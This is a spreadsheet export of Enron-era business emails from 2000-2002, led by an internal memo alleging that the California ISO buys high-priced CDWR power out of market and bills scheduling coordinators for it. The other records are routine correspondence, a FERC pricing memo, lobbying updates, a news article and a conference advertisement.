1.  According to two sources, the CAISO is helping to bail Gov. Davis out of his high-priced CDWR long-term power contracts by purchasing CDWR's excess energy as an "Out Of Market" purchase---instead of purchasing real-time energy from the CAISO's Supplemental Energy auction as required by the CAISO Tariff.  The costs of purchasing this high-cost power is being charged to Scheduling Coordinators who are largely unaware of the CAISO's surreptitious transactions._x000D_
_x000D_
2.  This sweetheart deal violates the CAISO Tariff, which requires the CAISO to buy energy from its Supplemental Energy (Real-Time) auction first.  CAISO Tariff, Dispatch Protocol section 8.6.2 (d).  Only after the CAISO has used up the Supplemental Energy  bids, can the CAISO buy Out Of Market ("OOM") energy.  If the CAISO were following the Tariff, CDWR's excess energy would be treated as an uninstructed deviation and CDWR would be paid the clearing price for Supplemental Energy---which is often as low as $0.00.  Therefore, under the Tariff the CAISO could have paid CDWR the same price paid to other SCs, but instead is buying it at a price agreeable to CDWR.  _x000D_
_x000D_
3.  By ignoring Supplemental Energy bids in favor of CDWR power, the CAISO is able to manipulate the price it pays for energy in the Supplemental Energy market.  Low CAISO demand for Supplemental Energy drives down prices.  The clearing price for Supplemental Energy has often been as low as $0.00.  Therefore, the CAISO gets to keep all excess energy on the grid for free.  If CDWR was not getting preferential treatment, its energy would be treated as excess energy, and it would get little or nothing for it._x000D_
_x000D_
4.  While there is no evidence that Gov. Davis has directed the CAISO to buy from CDWR first, this behavior clearly benefits Davis.  Absent the CAISO's purchases of CDWR's excess energy, CDWR would be forced to sell its energy at a huge loss in the open market (just like many other suppliers).  The media has been been making hay out of Davis's strategy of buying high and selling low.  Therefore, Davis and CDWR benefit by being able to offset some of their losses under the long-term contracts.  Of course, they are only able to offset their losses through a back-door deal with the CAISO._x000D_
_x000D_
5.  The costs of this expensive CDWR power are being passed through to unwitting Scheduling Coordinators who, frequently seeing 10-minute Ex Post prices of $0.00, expect that the cost of imbalance energy will be close to $0.00.  These SCs are in for a big surprise.  According to one source at Sierra Pacific, the CAISO charged him as much as $400/MWh for imbalance energy.  (Where is the price mitigation here?)_x000D_
_x000D_
6.  Who benefits under this scam?  Davis and CDWR.  Who loses under this scam?  In-state generators who are currently obligated to sell to the CAISO; Scheduling Coordinators who overgenerate or that have negative imbalances; consumers who end up paying higher prices for energy._x000D_
_x000D_
7.  Sources:  Our client representative from the CAISO has confirmed this practice and "the Friday Burrito," an industry insider publication mentioned it also._x000D_
_x000D_
8.  Here is the quote from the Friday Burrito:_x000D_
_x000D_
"There is another problem that is being introduced by the long-term contracts. The ISO is utilizing the DWR contracts as Out of Market (OOM) calls, thereby forcing the contract energy into the grid ahead of the supplemental energy bids in the balancing energy ex post (BEEP) market. As one of our faithful observers told me, "The ISO will be billing some DRW/CERS long-term contracts to SCs as OOM energy. This has been confirmed by the ISO. This means there is no real-time price transparency. We may see an hourly ex-post price of, say, $15, but this will bear no resemblance to the eventual Real-Time settlement price. There is no way to estimate what the OOM charge was as the ISO doesn't post that information. The implication is that parties buying real-time energy will wait 90 days before theyhave any idea of the price. This sort of price uncertainty is completely contrary to the FERC's goals of creating open, transparent markets." _x000D_
9.  Here is the e-mail from our CAISO representative:_x000D_
_x000D_
-----Original Message-----_x000D_
From: Almeida, Keoni [mailto:KAlmeida@caiso.com]_x000D_
Sent: Thursday, August 23, 2001 4:04 PM_x000D_
To: Emmert, Caroline; O'Neil, Murray P.; Gilbert, Scotty_x000D_
Cc: Sheidun, Donna; Blair, Kit_x000D_
Subject: RE: "Burrito"_x000D_
_x000D_
_x000D_
Issue highlighted in blue lettering. This is being researched internally and_x000D_
an ISO response on how these transactions are being handled should be_x000D_
forthcoming, I would think. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Keoni Almeida _x000D_
California Independent System Operator _x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352 _x000D_
alpha page:  9169812000.1151268@pagenet.net_x000D_
e-mail:  &lt;mailto:kalmeida@caiso.com&gt;_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Emmert, Caroline [mailto:Caroline.Emmert@ENRON.com]_x000D_
Sent: Thursday, August 23, 2001 3:15 PM_x000D_
To: Keoni Almeida (E-mail)_x000D_
Cc: Sheidun, Donna; Blair, Kit_x000D_
Subject: "Burrito"_x000D_
_x000D_
_x000D_
Can you send me a copy of the 'Burrito' that we were discussing, or at_x000D_
least outline in an e-mail the name of the person who has written about_x000D_
CERS and what was published?   What is the official name of this_x000D_
newsletter?  I have seen them in the past (Harvey Hall used to get it_x000D_
and sent a couple to me), but I haven't seen it for a long time._x000D_
_x000D_
Also, to recap our telephone discussion:  the charges assessed to the_x000D_
Market in Charge Type 487 are determined by CERS, and are being_x000D_
collected by the ISO on behalf of CERS, to cover the cost of contracts_x000D_
that CERS has signed for energy purchases? and 487 pricing/charges have_x000D_
do direct relationship to the Inc and Dec prices charged or paid to_x000D_
those who inadvertently over- or under-schedule?  Please clarify that I_x000D_
have understood this correctly._x000D_
_x000D_
Thanks a lot for your assistance._x000D_
_x000D_
Caroline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_x000D_
10.  Here is an e-mail from the intrepid and vigilant Kit Blair, in Volume Management, who first brought this scam to my attention._x000D_
 -----Original Message-----_x000D_
From: 	Blair, Kit  _x000D_
Sent:	Thursday, August 23, 2001 3:42 PM_x000D_
To:	Hall, Steve C. (Legal)_x000D_
Cc:	DL-Portland Volume Mgmt_x000D_
Subject:	487 Revelation_x000D_
_x000D_
Steve,_x000D_
	Here is a summary of what we have learned regarding how the CAISO is handling 487.  Kent at Sierra Power inquired to me why he was being charged 487, (487 is the charge code the CAISO uses when it has to go out of market, and purchase power that exceeds $150.00/mwh, 481 is the charge code they use to credit it back), for the same hours and intervals that both the INC and DEC prices were zero.  This was obviously very peculiar and nobody in VM knew the answer. So Caroline posed the question to Keoni at the CAISO.  His response was this:  that the CAISO is charging 487 regardless of the INC and DEC prices, to cover the forward market contracts signed by CDWR and CERS.  In effect, they are ignoring their tariff that states they are supposed to purchase power at the lowest price, and are in effect trying to recover costs for CDWR and CERS.   _x000D_
_x000D_
-Kit</t>
  </si>
  <si>
    <t>Tue, 15 Jan 2002 07:04:23 -0800 (PST)</t>
  </si>
  <si>
    <t>Brazil Energy 2002</t>
  </si>
  <si>
    <t>_x000D_
 [IMAGE]  =09_x000D_
  Request More Information   Register Now!      Learn from Leaders in  Braz=_x000D_
il's Energy Markets   [IMAGE]  "Outcomes of the Government's   Response to =_x000D_
the  Power Crisis"   Pedro Pullen Parente, Minister   Chief of Staff, Presi=_x000D_
dency of Brazil   Agencia Nacional de Petroleo (ANP)  Baker &amp; McKenzie  Ban=_x000D_
co Nacional de Desenvolvimento  Econ?mico e Social (BNDES)  CMS Energy  Cou=_x000D_
dert Brothers LLP  DCT Energia  Fitch  InterGen  Marubeni Power Internation=_x000D_
al  Milbank Tweed Hadley &amp; McCloy LLP  Ministerio de Minas e Energia  Opera=_x000D_
dor Nacional do Sistems  Eletrico (ONS)  Overseas Private Investment  Corpo=_x000D_
ration (OPIC)  PETROBRAS  Souza, Cescon Avedissian,  Barrieu e Flesch Advog=_x000D_
ados  Taylor-DeJongh, Inc.  Trench, Rossi e Watanabe Advogados  UBS Warburg=_x000D_
    Updates from:   Ministerio de Minas e Energia (MME)   Agencia Nacional =_x000D_
de Petroleo (ANP)  Operador Nacional do Sistems Eletrico (ONS)   Effects on=_x000D_
 investment of the macroeconomic environment, devaluation,  currency risks,=_x000D_
 conflicting political agendas and the 2002 elections  Market impact of Pet=_x000D_
robras's vertical integration and its role in the government's Emergency Po=_x000D_
wer Plant Program  Potential for a competitive process for power supply con=_x000D_
tracts, distribution of  risk and pass through of unmanageable risk  Evolut=_x000D_
ion of transmission facilities - Main grid expansion; interregional and int=_x000D_
ernational interconnection; results of the ANEEL auctioning process  Develo=_x000D_
ping wholesale gas markets - Position of Petrobras; potential new  supplies=_x000D_
 and transportation providers  The government's position on open access, to=_x000D_
lls and tariffs, and the tracking account mechanism for the gas price  Five=_x000D_
 steps to freedom - A view from the trenches on how to fix the current  obs=_x000D_
tacles to further development in the gas-to-power value chain             C=_x000D_
hoose from 2 Pre-Conference Workshops - Thursday, March 21, 2002         A.=_x000D_
    Obtaining  Financing in a  Changing Climate     B.   Mastering the Lega=_x000D_
l  Issues that Affect  Energy Projects in Brazil         Customer Service C=_x000D_
enter  Download Brochure    [IMAGE]      Contact Information  CBI prides it=_x000D_
self on making the registration process fast and convenientby providing 5 e=_x000D_
asy ways to register!    [IMAGE]   FAX 781-939-2490    [IMAGE]   PHONE 800-=_x000D_
817-8601 781-939-2438    [IMAGE]   WEBSITE cbinet.com      [IMAGE]   MAIL R=_x000D_
egistration Dept  CBI 500 W. Cummings Park, Ste 5100 Woburn, MA 01801    [I=_x000D_
MAGE]   EMAIL kimh@cbinet.com        =09_x000D_
_x000D_
_x000D_
=20_x000D_
=20_x000D_
If you received this e-mail in error or would like to be removed,  PLEASE C=_x000D_
LICK HERE=20_x000D_
0000639675</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 06:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Pick-Ups</t>
  </si>
  <si>
    <t>Please e-mail me who you want to add and drop.  _x000D_
_x000D_
Check you roster to make sure that it is legal._x000D_
_x000D_
_x000D_
I still need your dues by Sunday or you forfeit._x000D_
_x000D_
I have only received dues from Dave and Steve!</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 06:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'o=enron@enron.com', 'john.lavorato@enron.com', 'tim.belden@enron.com', 'mark.frevert@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>California Order Proxy Price Calculation</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Richard Shapiro/NA/Enron on 04/27/2001 _x000D_
01:07 PM ---------------------------_x000D_
_x000D_
_x000D_
"Jackie Gallagher" &lt;JGallagher@epsa.org&gt; on 04/27/2001 11:59:30 AM_x000D_
To: &lt;bhawkin@enron.com&gt;, &lt;bmerola@enron.com&gt;, &lt;christi.l.nicolay@enron.com&gt;, _x000D_
&lt;donna.fulton@enron.com&gt;, &lt;janelle.scheuer@enron.com&gt;, _x000D_
&lt;jeff_brown@enron.com&gt;, &lt;jhartso@enron.com&gt;, &lt;jsteffe@enron.com&gt;, _x000D_
&lt;ray.alvarez@enron.com&gt;, &lt;rshapiro@enron.com&gt;, &lt;sarah.novosel@enron.com&gt;, _x000D_
&lt;tom.hoatson@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: California Order Proxy Price Calculation_x000D_
_x000D_
MEMORANDUM_x000D_
_x000D_
TO: Regulatory Affairs Committee_x000D_
       Power Marketers Working Group_x000D_
_x000D_
FROM: Joe Hartsoe, Regulatory Affairs Committee Chair_x000D_
            Bob Reilley, Power Marketers Working Group Chair_x000D_
            Julie Simon, Vice President of Policy_x000D_
            Mark Bennett, Senior Manager of Policy_x000D_
            Erin Perrigo, Manager of Policy_x000D_
_x000D_
DATE: April 27, 2001_x000D_
_x000D_
RE: California Order Proxy Price Calculation_x000D_
_x000D_
We have had an initial opportunity to review FERC's Order Establishing _x000D_
Prospective Mitigation and Monitoring Plan for the California Wholesale _x000D_
Electric Markets and Establishing an Investigation of Public Utility Rates in _x000D_
Wholesale Western Energy Markets, and will provide a more detailed summary _x000D_
early next week._x000D_
_x000D_
However, questions have arisen as to the calculation of the proxy price when _x000D_
a stage 1, 2 or 3 emergency is called.  In initial discussions with FERC _x000D_
staff, we have determined that the price mitigation will work as follows:_x000D_
_x000D_
For the following day, the ISO will publish at 8 a.m. an average of the daily _x000D_
prices published in Gas Daily for all California delivery points, as well as _x000D_
emissions costs.  The emissions costs will be calculated by the ISO using the _x000D_
Cantor Fitzgerald Environmental Brokerage Service.  The marginal unit will _x000D_
then be determined via the single price auction in the hour, and the ISO will _x000D_
then take the previously submitted and confidential heat rate data and _x000D_
multiply it by the posted average gas price and emissions costs for that hour _x000D_
to determine the market clearing price.  The ISO will not be calculating an _x000D_
estimated market-clearing price in advance._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 31 Aug 2001 14:52:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dasovich.jeff@enron.com', 'mara.susan@enron.com', 'harry.kingerski@enron.com', 'govenar.hedy@enron.com', 'paul.kaufman@enron.com', 'leslie.lawner@enron.com', 'hansen.bev@enron.com', 'day.mike@enron.com', 'd..steffes@enron.com'})</t>
  </si>
  <si>
    <t>RE: SBX2 78  HEARING CANCELED</t>
  </si>
  <si>
    <t>Thanks, Scott.  Though the chances of re-kindling a bi-partisan, centrist deal among Rs, Ds and Davis are extremely small.  Richmond (Republican leading Assembly efforts) has agreed to stay in touch with  Bev over the weekend in the very unlikely event that something rekindles between Rs and Ds.  In the meantime, with Davis and the Assembly Ds drifting back to the left, we'll need to redouble our own efforts to make sure we don't lose the ground we've gained.  Scott, are they meeting again on  Monday, or Tuesday?_x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
-----Original Message-----_x000D_
From: Scott Govenar [mailto:sgovenar@govadv.com]_x000D_
Sent: Friday, August 31, 2001 2:57 PM_x000D_
To: Rick Shapiro; Steffes, James D.; Kaufman, Paul; Jeff Dasovich;_x000D_
Kingerski, Harry; Lawner, Leslie; Susan J Mara; Hedy Govenar; Bev_x000D_
Hansen; Mike Day_x000D_
Subject: SBX2 78 HEARING CANCELED_x000D_
_x000D_
_x000D_
The Assembly Appropriations Committee canceled the SBX2 78 hearing mid-way_x000D_
through the presentation by Senator Polanco.  As Hedy indicated before, with_x000D_
the Republicans not willing to vote for the bill, liberal Democrats crafted_x000D_
11 new amendments which they felt were necessary in order to garner their_x000D_
votes.  Clearly there was no consensus among committee members or leadership_x000D_
on the amendments in question and the business community was up in arms._x000D_
Amid the confusion, Hertzberg effectively ordered the hearing canceled._x000D_
They intend to hear the bill again on Monday.</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 09:37:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: It seems to be unraveling for Davis--Need Ron or Dan to get_x000D_
 CPUC Filings at FERC</t>
  </si>
  <si>
    <t xml:space="preserve">I love it.  Unfortunately, ENA would likely go bonkers since many of the folks whose deals we'd be bettering also happen to be big ENA customers.  If there's a way to finesse it (e.g., "Enron offers State big power deal for 1/2 what State contracted for"), it would really bring the house down.  But I think that ENA would get damn queasy about doing it._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Palmer, Mark A. (PR)  _x000D_
Sent:	Monday, October 01, 2001 11:35 AM_x000D_
To:	Dasovich, Jeff_x000D_
Subject:	RE: It seems to be unraveling for Davis--Need Ron or Dan to get CPUC Filings at FERC_x000D_
_x000D_
What if we started offering some better deals?  Save the state billions .... what do you think?_x000D_
_x000D_
Mark_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dasovich, Jeff  _x000D_
Sent:	Monday, October 01, 2001 10:30 AM_x000D_
To:	Kean, Steven J.; Denne, Karen; Steffes, James D.; Shapiro, Richard; Mara, Susan; Kaufman, Paul; Comnes, Alan; Robertson, Linda; Landwehr, Susan M.; Palmer, Mark A. (PR)_x000D_
Subject:	It seems to be unraveling for Davis--Need Ron or Dan to get CPUC Filings at FERC_x000D_
_x000D_
FYI. Split between Davis and Lynch is now very public.  Davis is likely losing his mind.  Can Ron Carroll or Dan Watkiss search these filings down at FERC?  Thanks._x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
State PUC seeks to void Davis's power contracts _x000D_
Deals gouge consumers, agency tells federal regulators _x000D_
In a move that could undermine California's hard-won control of the power market, state regulators are urging the federal government to throw out prices for some electricity contracts agreed to by Gov. Gray Davis. _x000D_
The state Public Utilities Commission, in what amounts to a rearguard action against the governor's power strategy, is arguing that some of the deals gouge Californians. The PUC says energy firms probably took advantage of the state's power crisis earlier this year to charge unfairly high prices, and it wants some of those prices cut. _x000D_
"The state is going to get itself into serious trouble with those contracts if they're not renegotiated," Commissioner Richard Bilas said. "I would support anything that would help us get the prices of those contracts down." _x000D_
The PUC apparently did not tell Davis administration officials that it was challenging the contracts before the Federal Energy Regulatory Commission. _x000D_
"It's definitely not something that's a favorable thing to have happen to us," said Oscar Hidalgo, a spokesman for the state Department of Water Resources, which negotiated the contracts. _x000D_
Hidalgo said the long-term contracts, even though more expensive than current market prices, are the bulwark that protects the state from another round of spiraling spot market prices. _x000D_
"It would be a mistake to try to void those contracts out," Hidalgo said. "If that's the goal, then we're back to square one. Prices would start to creep up." _x000D_
The state is paying an average of $69 a megawatt hour under the contracts it has signed with private generators. Peak prices for electricity last week were less than $30. _x000D_
Hidalgo could not say whether the PUC actions could expose the state to lawsuits by the contractors or threaten a planned $12.5 billion bond issue to repay the state general fund for the power purchases. _x000D_
Over the past three months, lawyers for the PUC have filed challenges on various grounds before the Federal Energy Regulatory Commission against deals negotiated with PacifiCorp Power Marketing Inc., Alliance Colton LLC, Sempra Energy and a Calpine Corp. subsidiary, said PUC attorney Sean Gallagher. _x000D_
SEMPRA, CALPINE CONTRACTS_x000D_
Taken together, Sempra and Calpine have sold about half the electricity that the Davis administration has agreed to buy in an array of 53 agreements, some of which last 20 years. In all, California has committed to spending at least $43 billion for electricity. _x000D_
The deal with PacifiCorp Power Marketing has already come under attack because while the state was negotiating the $1 billion contract, one of Davis' energy consultants owned stock in the power supplier's parent company. _x000D_
Gallagher said PUC attorneys may recommend commission actions against other contracts. _x000D_
Davis' spokesman Steve Maviglio said Friday the administration couldn't comment until it had studied the PUC submissions. _x000D_
The PUC's challenges mark the latest battle between Davis and the five- member commission, which is resisting administration energy policies even though it is controlled by the governor's three appointees. _x000D_
The commission has rebuffed Davis' attempts to nail down a mechanism for utility customers to cover the costs of the long-term power contracts and pay off the planned $12.5 billion bond issue. _x000D_
STATE TREASURER'S WARNING_x000D_
State Treasurer Phil Angelides warned last week that the PUC's actions threatened to delay the bond issue and leave a $9 billion hole in the state budget next year. _x000D_
PUC President Loretta Lynch opposes the bond plan because it requires the commission to rubber-stamp the power contracts and forces the state to maintain a prolonged role as an energy buyer. _x000D_
"We should not, through the instrument of the bonds, lock down the policy choices for the state for 15 years," Lynch said last week. "We should stay as flexible as possible. _x000D_
Lynch could not be reached for comment on the commission's challenges to the contracts. _x000D_
Commissioner Jeff Brown, Lynch's fellow Davis appointee, said the filings don't rule out Davis' bond financing deal. Nor do they threaten a state default on the long-term contracts, he said. But federal action could help the state improve the deals, he said. _x000D_
"The state of California has never consciously defaulted on a contract," he said. "Even if we renegotiate, we'll renegotiate within the confines of the contract." _x000D_
Hidalgo, however, said he doubted the state could modify the contracts. Under power granted by the Legislature, he said, the water department made its own finding that the contract prices were reasonable. _x000D_
Jan Mitchell, a spokeswoman for ScottishPower, parent company of PacifiCorp Power Marketing, said both sides agreed to the contract after full negotiations. _x000D_
"Now another California agency is disputing it," Mitchell said. "We obviously disagree, and we'll continue to work with FERC, making sure the contracts are honored." _x000D_
PUC CRITICAL OF DEALINGS_x000D_
The PUC argues that the Portland energy firm wielded excessive market power when the state signed its 10-year, $1 billion deal with the company July 6. That forced the water department to accept unfair prices to avoid blackouts, the PUC says. _x000D_
"News reports suggest that the (water department) paid substantially over the then-current market prices for this contract, prices which will be passed through to California retail ratepayers," the PUC said. _x000D_
An energy consultant to Davis, Vikram Budhraja, admitted in August that he owned as much as $10,000 worth of Scottish Power stock while the deal was being worked out. Budhraja sold the stock July 30, and state officials said he had nothing to do with the PacifiCorp Power Marketing deal. _x000D_
Uncertainty over the contracts adds to growing turmoil in the state's energy picture. While the issue has slipped from the public eye, Davis' solutions to the energy crisis are meeting resistance not only from the PUC but from fellow Democrats in the state Senate, which has refused to pass his plan to stabilize Southern California Edison's finances and stave off a second utility bankruptcy filing. _x000D_
While officials fight among themselves, the energy industry is moving aggressively to reverse state efforts to put the brakes on deregulation. _x000D_
***************************************************_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 09:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tom.callaghan@enron.com'})</t>
  </si>
  <si>
    <t>Re: Warranty Claims</t>
  </si>
  <si>
    <t xml:space="preserve">Hi guys,_x000D_
_x000D_
I suggest a brief meeting to discuss strategy before anything is sent to SW.  _x000D_
_x000D_
Kay _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Mitch Robinson/Corp/Enron@ENRON_x000D_
cc: Kay Mann/Corp/Enron@Enron, Gavin _x000D_
Gaul/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Pete McCormick@ENRON, Ross _x000D_
Newlin@ENRON, Chris Norris@ENRON _x000D_
_x000D_
Subject: Re: Warranty Claims  _x000D_
_x000D_
Mitch, no problem here.  Pete/Chris, along with Ross will handle outstanding _x000D_
warranty issues.  Pete,Chris please submit your warranty items to Ross, Ross _x000D_
please work with Gavin to ensure that EE&amp;CC's meshes with ours._x000D_
_x000D_
Thanks_x000D_
_x000D_
Tom_x000D_
_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Gavin Gaul/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Pete McCormick, Ross _x000D_
Newlin, Chris Norris, Tom Callaghan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Warranty Claims_x000D_
_x000D_
Kay -_x000D_
_x000D_
As part of the contract implementation, we need to authorize the plant _x000D_
managers at Gleason and Wheatland to execute warranty issues with _x000D_
Westinghouse.  I've taken a first stab.  Please review from a legal _x000D_
perspective and change as necessary.  Note that there are 3 total contracts, _x000D_
two for Gleason and one for Wheatland._x000D_
_x000D_
Gavin, please provide contact names and addresses to Kay for the Westinghouse _x000D_
section.  Please also provide the contract numbers._x000D_
_x000D_
Pete &amp; Chris, my intention is to empower you to be able to talk directly with _x000D_
SW on warranty issues.  Obviously, the terms of the O&amp;M contract and common _x000D_
sense should dictate when you cut in the owner (me). Additionally, OEC's _x000D_
internal procedures and methods will dictate when you cut in your chain of _x000D_
command.  Performance test issues, MW limiter issues, etc will be coordinated _x000D_
by Houston since they involve deeper commercial issues._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mitch_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Governor King sends regards</t>
  </si>
  <si>
    <t xml:space="preserve"> I recently met with Maine Governor, Angus King.  He recalled fondly our _x000D_
meeting with him two years ago and asked me to extend to you his best regards._x000D_
_x000D_
Governor King was pleased to hear that EES is now serving at retail 25% of _x000D_
the entire electric load in his state.  George Wood of ENA, who arranged the _x000D_
meeting, also informed the Governor that ENA is interested in responding to a _x000D_
forthcoming RFP for supply of service to Maine customers who do not choose a _x000D_
supplier._x000D_
_x000D_
Just thought you might like to know._x000D_
_x000D_
     Dan Allegretti_x000D_
     Government Affairs</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 08:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Option to Purchase Real Estate re TitanFehr.DOC</t>
  </si>
  <si>
    <t xml:space="preserve">This makes me crazy.  I ask her to send me a document, and she copies TWO _x000D_
partners on the transmittal, plus Fred and Rusty.  _x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 09/18/2000 03:12 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Way, Karen S. - CHI" &lt;karen.way@piperrudnick.com&gt; on 09/18/2000 02:58:55 PM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;, "'rusty.stevens@enron.com'" _x000D_
&lt;rusty.stevens@enron.com&gt;, "'fred.mitro@enron.com'" &lt;fred.mitro@enron.com&gt;_x000D_
cc: "Gershon, Mark A. - CHI" &lt;Mark.Gershon@piperrudnick.com&gt;, "Shindler, _x000D_
Donald A. - CHI" &lt;Donald.Shindler@piperrudnick.com&gt; _x000D_
_x000D_
Subject: Option to Purchase Real Estate re TitanFehr.DOC_x000D_
_x000D_
_x000D_
 &lt;&lt;Option to Purchase Real Estate re TitanFehr.DOC&gt;&gt;_x000D_
_x000D_
_x000D_
Kay:_x000D_
Per your previous email,  attached is the electronic version of the_x000D_
Titan-Fehr Option for your review.  Please call with any questions.  Thanks!_x000D_
_x000D_
Karen S. Way_x000D_
Piper Marbury Rudnick &amp; Wolfe_x000D_
203 N. LaSalle_x000D_
Chicago, Illinois 60601_x000D_
email:  karen.way@piperrudnick.com_x000D_
(ph) 312-368-2152_x000D_
(fax) 312-630-6347_x000D_
_x000D_
_x000D_
_x000D_
_____________________________________________________________________________x000D_
The e-mail address and domain name of the sender changed on November 1, _x000D_
1999.  Please update your records._x000D_
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 Option to Purchase Real Estate re TitanFehr.DOC_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 12:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Kate,_x000D_
_x000D_
 &lt;&lt;MeadMktPlace-def.doc&gt;&gt;  &lt;&lt;NP15 SP15 def.doc&gt;&gt;_x000D_
Ernest Onukogu_x000D_
Energy Services_x000D_
Dow Jones &amp; Company_x000D_
P.O.Box 300_x000D_
Princeton, N.J. 08543-0300_x000D_
609 520-4663_x000D_
_x000D_
_x000D_
 - MeadMktPlace-def.doc_x000D_
 - NP15 SP15 def.doc</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 01:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tanya.tamarchenko@enron.com'})</t>
  </si>
  <si>
    <t>Interview Schedule for Japan office</t>
  </si>
  <si>
    <t xml:space="preserve">Tanya,_x000D_
_x000D_
You and I will interview Yumi, a candidate for Darren DeLage in Tokyo office._x000D_
_x000D_
The time is scheduled at 4:50pm next Tuesday in my office.  I will get the _x000D_
resume_x000D_
before the interview.  Please mark the interview time on your schedule._x000D_
Thanks._x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Zimin Lu/HOU/ECT on 01/12/2001 09:00 AM _x000D_
---------------------------_x000D_
From: Darren Delage@ENRON on 01/12/2001 11:59 AM ZE9_x000D_
To: "mm21yumi" &lt;mm21yumi@livedoor.com&gt;_x000D_
cc: Zimin Lu/HOU/ECT@ECT _x000D_
Subject: Re: Next Tuesday  _x000D_
_x000D_
Good afternoon Imokawa-San,_x000D_
_x000D_
We would like to invite you to have a brief dialogue with some members of our _x000D_
research team. They would like to ask you to briefly expound on  your _x000D_
mathematical studies. If you could please contact them  next Wednesday at _x000D_
7:50 AM (it should be 4:50 PM Houston time, Tuesday). The conversation should _x000D_
take no more than 20 minutes of your time, and will enable us to get a more _x000D_
enhanced understanding of your quantitative abilities._x000D_
_x000D_
Zimin Lu, Director of Research , can be reached at  713-853-6388_x000D_
to dial from Japan , 0061-1-713-853-6388_x000D_
If you could please send Zimin a copy of your resume before the interview, _x000D_
that would be much appreciated. You can call the above number to obtain the _x000D_
appropriate fax number. _x000D_
_x000D_
I will be in touch with you shortly thereafter._x000D_
_x000D_
Sincerely,_x000D_
Darren_x000D_
_x000D_
_x000D_
_x000D_
	"mm21yumi" &lt;mm21yumi@livedoor.com&gt;_x000D_
	01/11/2001 08:35 PM_x000D_
		 _x000D_
		 To: &lt;Darren.Delage@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Thank you_x000D_
_x000D_
Darren, thank you for cordinating everything.  _x000D_
I understand it takes time, this is_x000D_
only the first week of the year in Japan, and I do not like to_x000D_
push you much.  Normally, I have long meetings every Thursday._x000D_
For other dates, I make best effort to fit the schedule for_x000D_
your convenience, including early morning or late evening. _x000D_
I am looking forward to seeing you sometime soon._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Yumi Imokawa_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 15:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>AEP Checkout Discrepancy</t>
  </si>
  <si>
    <t>March 12, HE13, (2) 50 MW deals @ sell price $47, AEP showing purchased @ _x000D_
$42.</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 08:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>[Fwd: Hertzberg Press Conference]</t>
  </si>
  <si>
    <t>Received: (qmail 47628 invoked by uid 41); 29 May 2001 22:05:14 -0000_x000D_
Received: from mtiwmhc24.worldnet.att.net (204.127.131.49)  by=20_x000D_
mx6.quiknet.com with SMTP; 29 May 2001 22:05:14 -0000_x000D_
Received: from vaio ([12.72.49.51]) by mtiwmhc24.worldnet.att.net         =_x000D_
=20_x000D_
(InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP          id=20_x000D_
&lt;20010529220129.COZN12661.mtiwmhc24.worldnet.att.net@vaio&gt;;          Tue, 2=_x000D_
9=20_x000D_
May 2001 22:01:29 +0000_x000D_
Message-ID: &lt;000f01c0e88b$1f52eb80$3331480c@vaio&gt;_x000D_
From: "Ken Smith" &lt;ken@kdscommunications.com&gt;_x000D_
To: "Sandra McCubbin" &lt;smccubbi@enron.com&gt;, &lt;Janel.Guerrero@enron.com&gt;,=20_x000D_
"Scott Govenar" &lt;sgovenar@govadv.com&gt;_x000D_
Subject: Hertzberg Press Conference_x000D_
Date: Tue, 29 May 2001 15:02:42 -0700_x000D_
Organization: KDS Communications_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/alternative;=20_x000D_
boundary=3D"----=3D_NextPart_000_000C_01C0E850.68FFDBC0"_x000D_
X-Priority: 3_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook Express 5.00.2615.200_x000D_
